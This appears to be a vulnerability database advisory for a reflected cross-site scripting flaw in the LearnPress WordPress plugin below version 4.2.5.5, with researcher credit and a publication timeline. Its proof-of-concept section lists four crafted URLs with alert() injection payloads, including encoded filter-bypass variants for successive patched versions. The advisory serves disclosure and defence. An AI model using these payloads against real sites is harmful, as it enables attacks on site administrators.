WordPress Plugin Vulnerabilities
LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Proof of Concept
Make a logged in admin open v < 4.2.5.2 - https://example.com/?param=value"}';alert(document.domain)<!-- v < 4.2.5.3 - https://example.com/?param=value"}';alert(document.domain);b=' v < 4.2.5.4 - https://example.com/?'-alert(`XSS`)-'=a v < 4.2.5.5 - https://example.com/instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3BXSS%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vitor Pacheco
Submitter
Vitor Pacheco
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-17 (about 5 months ago)
Added
2023-11-17 (about 5 months ago)
Last Updated
2024-01-08 (about 4 months ago)